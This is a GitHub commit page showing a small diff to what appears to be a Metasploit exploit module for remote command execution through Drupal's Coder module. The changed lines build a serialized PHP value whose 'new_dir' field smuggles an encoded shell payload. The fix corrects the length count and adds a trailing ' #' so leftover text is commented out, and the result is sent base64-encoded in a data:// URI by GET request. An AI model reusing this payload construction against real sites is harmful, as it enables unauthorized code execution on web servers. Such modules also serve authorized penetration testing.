We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent ba79579 commit d38e9f8Copy full SHA for d38e9f8
modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -80,10 +80,10 @@ def exploit
80
p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
81
p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
82
p << 's:7:"new_dir";s:'
83
- p << (payload.encoded.length + 4).to_s
+ p << (payload.encoded.length + 5).to_s
84
p << ':"-v;'
85
p << payload.encoded
86
- p << ';";s:4:"name";s:4:"test";}}}'
+ p << ' #";s:4:"name";s:4:"test";}}}'
87
payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
88
send_request_cgi(
89
'method' => 'GET',
0 commit comments